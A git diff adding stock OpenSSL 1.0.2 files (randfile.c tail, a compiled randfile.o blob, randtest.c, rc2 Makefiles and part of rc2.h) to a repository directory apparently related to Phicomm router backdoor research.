+    RAND_add(&sb, sizeof(sb), 0.0);
+#endif
+    if (bytes == 0)
+        return (ret);
+
+#ifdef OPENSSL_SYS_VMS
+    in = vms_fopen(file, "rb", VMS_OPEN_ATTRS);
+#else
+    in = fopen(file, "rb");
+#endif
+    if (in == NULL)
+        goto err;
+#if defined(S_IFBLK) && defined(S_IFCHR) && !defined(OPENSSL_NO_POSIX_IO)
+    if (sb.st_mode & (S_IFBLK | S_IFCHR)) {
+        /*
+         * this file is a device. we don't want read an infinite number of
+         * bytes from a random device, nor do we want to use buffered I/O
+         * because we will waste system entropy.
+         */
+        bytes = (bytes == -1) ? 2048 : bytes; /* ok, is 2048 enough? */
+# ifndef OPENSSL_NO_SETVBUF_IONBF
+        setvbuf(in, NULL, _IONBF, 0); /* don't do buffered reads */
+# endif                         /* ndef OPENSSL_NO_SETVBUF_IONBF */
+    }
+#endif
+    for (;;) {
+        if (bytes > 0)
+            n = (bytes < BUFSIZE) ? (int)bytes : BUFSIZE;
+        else
+            n = BUFSIZE;
+        i = fread(buf, 1, n, in);
+        if (i <= 0)
+            break;
+#ifdef PURIFY
+        RAND_add(buf, i, (double)i);
+#else
+        /* even if n != i, use the full array */
+        RAND_add(buf, n, (double)i);
+#endif
+        ret += i;
+        if (bytes > 0) {
+            bytes -= n;
+            if (bytes <= 0)
+                break;
+        }
+    }
+    fclose(in);
+    OPENSSL_cleanse(buf, BUFSIZE);
+ err:
+    return (ret);
+}
+
+int RAND_write_file(const char *file)
+{
+    unsigned char buf[BUFSIZE];
+    int i, ret = 0, rand_err = 0;
+    FILE *out = NULL;
+    int n;
+#ifndef OPENSSL_NO_POSIX_IO
+    struct stat sb;
+
+    i = stat(file, &sb);
+    if (i != -1) {
+# if defined(S_ISBLK) && defined(S_ISCHR)
+        if (S_ISBLK(sb.st_mode) || S_ISCHR(sb.st_mode)) {
+            /*
+             * this file is a device. we don't write back to it. we
+             * "succeed" on the assumption this is some sort of random
+             * device. Otherwise attempting to write to and chmod the device
+             * causes problems.
+             */
+            return (1);
+        }
+# endif
+    }
+#endif
+
+#if defined(O_CREAT) && !defined(OPENSSL_NO_POSIX_IO) && !defined(OPENSSL_SYS_VMS)
+    {
+# ifndef O_BINARY
+#  define O_BINARY 0
+# endif
+        /*
+         * chmod(..., 0600) is too late to protect the file, permissions
+         * should be restrictive from the start
+         */
+        int fd = open(file, O_WRONLY | O_CREAT | O_BINARY, 0600);
+        if (fd != -1)
+            out = fdopen(fd, "wb");
+    }
+#endif
+
+#ifdef OPENSSL_SYS_VMS
+    /*
+     * VMS NOTE: Prior versions of this routine created a _new_ version of
+     * the rand file for each call into this routine, then deleted all
+     * existing versions named ;-1, and finally renamed the current version
+     * as ';1'. Under concurrent usage, this resulted in an RMS race
+     * condition in rename() which could orphan files (see vms message help
+     * for RMS$_REENT). With the fopen() calls below, openssl/VMS now shares
+     * the top-level version of the rand file. Note that there may still be
+     * conditions where the top-level rand file is locked. If so, this code
+     * will then create a new version of the rand file. Without the delete
+     * and rename code, this can result in ascending file versions that stop
+     * at version 32767, and this routine will then return an error. The
+     * remedy for this is to recode the calling application to avoid
+     * concurrent use of the rand file, or synchronize usage at the
+     * application level. Also consider whether or not you NEED a persistent
+     * rand file in a concurrent use situation.
+     */
+
+    out = vms_fopen(file, "rb+", VMS_OPEN_ATTRS);
+    if (out == NULL)
+        out = vms_fopen(file, "wb", VMS_OPEN_ATTRS);
+#else
+    if (out == NULL)
+        out = fopen(file, "wb");
+#endif
+    if (out == NULL)
+        goto err;
+
+#ifndef NO_CHMOD
+    chmod(file, 0600);
+#endif
+    n = RAND_DATA;
+    for (;;) {
+        i = (n > BUFSIZE) ? BUFSIZE : n;
+        n -= BUFSIZE;
+        if (RAND_bytes(buf, i) <= 0)
+            rand_err = 1;
+        i = fwrite(buf, 1, i, out);
+        if (i <= 0) {
+            ret = 0;
+            break;
+        }
+        ret += i;
+        if (n <= 0)
+            break;
+    }
+
+    fclose(out);
+    OPENSSL_cleanse(buf, BUFSIZE);
+ err:
+    return (rand_err ? -1 : ret);
+}
+
+const char *RAND_file_name(char *buf, size_t size)
+{
+    char *s = NULL;
+#ifdef __OpenBSD__
+    struct stat sb;
+#endif
+
+    if (OPENSSL_issetugid() == 0)
+        s = getenv("RANDFILE");
+    if (s != NULL && *s && strlen(s) + 1 < size) {
+        if (BUF_strlcpy(buf, s, size) >= size)
+            return NULL;
+    } else {
+        if (OPENSSL_issetugid() == 0)
+            s = getenv("HOME");
+#ifdef DEFAULT_HOME
+        if (s == NULL) {
+            s = DEFAULT_HOME;
+        }
+#endif
+        if (s && *s && strlen(s) + strlen(RFILE) + 2 < size) {
+            BUF_strlcpy(buf, s, size);
+#ifndef OPENSSL_SYS_VMS
+            BUF_strlcat(buf, "/", size);
+#endif
+            BUF_strlcat(buf, RFILE, size);
+        } else
+            buf[0] = '\0';      /* no file name */
+    }
+
+#ifdef __OpenBSD__
+    /*
+     * given that all random loads just fail if the file can't be seen on a
+     * stat, we stat the file we're returning, if it fails, use /dev/arandom
+     * instead. this allows the user to use their own source for good random
+     * data, but defaults to something hopefully decent if that isn't
+     * available.
+     */
+
+    if (!buf[0])
+        if (BUF_strlcpy(buf, "/dev/arandom", size) >= size) {
+            return (NULL);
+        }
+    if (stat(buf, &sb) == -1)
+        if (BUF_strlcpy(buf, "/dev/arandom", size) >= size) {
+            return (NULL);
+        }
+#endif
+    return (buf);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randfile.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randfile.o
new file mode 100644
index 0000000000000000000000000000000000000000..4d2b837dedcb71aa98655cc9e0b899928a90166a
GIT binary patch
literal 4288
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
Ungsu23&rQy{9lKD(aiDx0zm#BSO5S3

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randtest.c
new file mode 100644
index 0000000..91bcac9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randtest.c
@@ -0,0 +1,209 @@
+/* crypto/rand/randtest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/rand.h>
+
+#include "../e_os.h"
+
+/* some FIPS 140-1 random number test */
+/* some simple tests */
+
+int main(int argc, char **argv)
+{
+    unsigned char buf[2500];
+    int i, j, k, s, sign, nsign, err = 0;
+    unsigned long n1;
+    unsigned long n2[16];
+    unsigned long runs[2][34];
+    /*
+     * double d;
+     */
+    long d;
+
+    i = RAND_pseudo_bytes(buf, 2500);
+    if (i < 0) {
+        printf("init failed, the rand method is not properly installed\n");
+        err++;
+        goto err;
+    }
+
+    n1 = 0;
+    for (i = 0; i < 16; i++)
+        n2[i] = 0;
+    for (i = 0; i < 34; i++)
+        runs[0][i] = runs[1][i] = 0;
+
+    /* test 1 and 2 */
+    sign = 0;
+    nsign = 0;
+    for (i = 0; i < 2500; i++) {
+        j = buf[i];
+
+        n2[j & 0x0f]++;
+        n2[(j >> 4) & 0x0f]++;
+
+        for (k = 0; k < 8; k++) {
+            s = (j & 0x01);
+            if (s == sign)
+                nsign++;
+            else {
+                if (nsign > 34)
+                    nsign = 34;
+                if (nsign != 0) {
+                    runs[sign][nsign - 1]++;
+                    if (nsign > 6)
+                        runs[sign][5]++;
+                }
+                sign = s;
+                nsign = 1;
+            }
+
+            if (s)
+                n1++;
+            j >>= 1;
+        }
+    }
+    if (nsign > 34)
+        nsign = 34;
+    if (nsign != 0)
+        runs[sign][nsign - 1]++;
+
+    /* test 1 */
+    if (!((9654 < n1) && (n1 < 10346))) {
+        printf("test 1 failed, X=%lu\n", n1);
+        err++;
+    }
+    printf("test 1 done\n");
+
+    /* test 2 */
+#ifdef undef
+    d = 0;
+    for (i = 0; i < 16; i++)
+        d += n2[i] * n2[i];
+    d = d * 16.0 / 5000.0 - 5000.0;
+    if (!((1.03 < d) && (d < 57.4))) {
+        printf("test 2 failed, X=%.2f\n", d);
+        err++;
+    }
+#endif
+    d = 0;
+    for (i = 0; i < 16; i++)
+        d += n2[i] * n2[i];
+    d = (d * 8) / 25 - 500000;
+    if (!((103 < d) && (d < 5740))) {
+        printf("test 2 failed, X=%ld.%02ld\n", d / 100L, d % 100L);
+        err++;
+    }
+    printf("test 2 done\n");
+
+    /* test 3 */
+    for (i = 0; i < 2; i++) {
+        if (!((2267 < runs[i][0]) && (runs[i][0] < 2733))) {
+            printf("test 3 failed, bit=%d run=%d num=%lu\n",
+                   i, 1, runs[i][0]);
+            err++;
+        }
+        if (!((1079 < runs[i][1]) && (runs[i][1] < 1421))) {
+            printf("test 3 failed, bit=%d run=%d num=%lu\n",
+                   i, 2, runs[i][1]);
+            err++;
+        }
+        if (!((502 < runs[i][2]) && (runs[i][2] < 748))) {
+            printf("test 3 failed, bit=%d run=%d num=%lu\n",
+                   i, 3, runs[i][2]);
+            err++;
+        }
+        if (!((223 < runs[i][3]) && (runs[i][3] < 402))) {
+            printf("test 3 failed, bit=%d run=%d num=%lu\n",
+                   i, 4, runs[i][3]);
+            err++;
+        }
+        if (!((90 < runs[i][4]) && (runs[i][4] < 223))) {
+            printf("test 3 failed, bit=%d run=%d num=%lu\n",
+                   i, 5, runs[i][4]);
+            err++;
+        }
+        if (!((90 < runs[i][5]) && (runs[i][5] < 223))) {
+            printf("test 3 failed, bit=%d run=%d num=%lu\n",
+                   i, 6, runs[i][5]);
+            err++;
+        }
+    }
+    printf("test 3 done\n");
+
+    /* test 4 */
+    if (runs[0][33] != 0) {
+        printf("test 4 failed, bit=%d run=%d num=%lu\n", 0, 34, runs[0][33]);
+        err++;
+    }
+    if (runs[1][33] != 0) {
+        printf("test 4 failed, bit=%d run=%d num=%lu\n", 1, 34, runs[1][33]);
+        err++;
+    }
+    printf("test 4 done\n");
+ err:
+    err = ((err) ? 1 : 0);
+#ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+#endif
+    EXIT(err);
+    return (err);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile
new file mode 100644
index 0000000..8a9d49a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile
@@ -0,0 +1,90 @@
+#
+# OpenSSL/crypto/rc2/Makefile
+#
+
+DIR=	rc2
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=rc2test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rc2_ecb.c rc2_skey.c rc2_cbc.c rc2cfb64.c rc2ofb64.c
+LIBOBJ=rc2_ecb.o rc2_skey.o rc2_cbc.o rc2cfb64.o rc2ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rc2.h
+HEADER=	rc2_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rc2_cbc.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc2.h
+rc2_cbc.o: rc2_cbc.c rc2_locl.h
+rc2_ecb.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rc2_ecb.o: ../../include/openssl/rc2.h rc2_ecb.c rc2_locl.h
+rc2_skey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rc2_skey.o: ../../include/openssl/opensslconf.h
+rc2_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rc2_skey.o: ../../include/openssl/rc2.h ../../include/openssl/safestack.h
+rc2_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rc2_skey.o: rc2_locl.h rc2_skey.c
+rc2cfb64.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc2.h
+rc2cfb64.o: rc2_locl.h rc2cfb64.c
+rc2ofb64.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc2.h
+rc2ofb64.o: rc2_locl.h rc2ofb64.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile.bak
new file mode 100644
index 0000000..8a9d49a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile.bak
@@ -0,0 +1,90 @@
+#
+# OpenSSL/crypto/rc2/Makefile
+#
+
+DIR=	rc2
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=rc2test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rc2_ecb.c rc2_skey.c rc2_cbc.c rc2cfb64.c rc2ofb64.c
+LIBOBJ=rc2_ecb.o rc2_skey.o rc2_cbc.o rc2cfb64.o rc2ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rc2.h
+HEADER=	rc2_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rc2_cbc.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc2.h
+rc2_cbc.o: rc2_cbc.c rc2_locl.h
+rc2_ecb.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rc2_ecb.o: ../../include/openssl/rc2.h rc2_ecb.c rc2_locl.h
+rc2_skey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rc2_skey.o: ../../include/openssl/opensslconf.h
+rc2_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rc2_skey.o: ../../include/openssl/rc2.h ../../include/openssl/safestack.h
+rc2_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rc2_skey.o: rc2_locl.h rc2_skey.c
+rc2cfb64.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc2.h
+rc2cfb64.o: rc2_locl.h rc2cfb64.c
+rc2ofb64.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc2.h
+rc2ofb64.o: rc2_locl.h rc2ofb64.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile.save
new file mode 100644
index 0000000..8a9d49a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/Makefile.save
@@ -0,0 +1,90 @@
+#
+# OpenSSL/crypto/rc2/Makefile
+#
+
+DIR=	rc2
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=rc2test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rc2_ecb.c rc2_skey.c rc2_cbc.c rc2cfb64.c rc2ofb64.c
+LIBOBJ=rc2_ecb.o rc2_skey.o rc2_cbc.o rc2cfb64.o rc2ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rc2.h
+HEADER=	rc2_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rc2_cbc.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc2.h
+rc2_cbc.o: rc2_cbc.c rc2_locl.h
+rc2_ecb.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rc2_ecb.o: ../../include/openssl/rc2.h rc2_ecb.c rc2_locl.h
+rc2_skey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rc2_skey.o: ../../include/openssl/opensslconf.h
+rc2_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rc2_skey.o: ../../include/openssl/rc2.h ../../include/openssl/safestack.h
+rc2_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rc2_skey.o: rc2_locl.h rc2_skey.c
+rc2cfb64.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc2.h
+rc2cfb64.o: rc2_locl.h rc2cfb64.c
+rc2ofb64.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc2.h
+rc2ofb64.o: rc2_locl.h rc2ofb64.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2.h
new file mode 100644
index 0000000..29d02d7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2.h
@@ -0,0 +1,103 @@
+/* crypto/rc2/rc2.h */
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
